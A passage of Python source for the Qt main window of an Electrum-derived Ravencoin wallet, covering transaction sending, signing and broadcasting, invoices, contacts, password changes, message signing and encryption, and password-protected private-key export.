'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return
if o.value is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
#use_rbf = self.config.get('use_rbf', True)
#if use_rbf:
# tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except Exception as e:
status, msg = False, repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("ravencoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(e))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-rvn-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
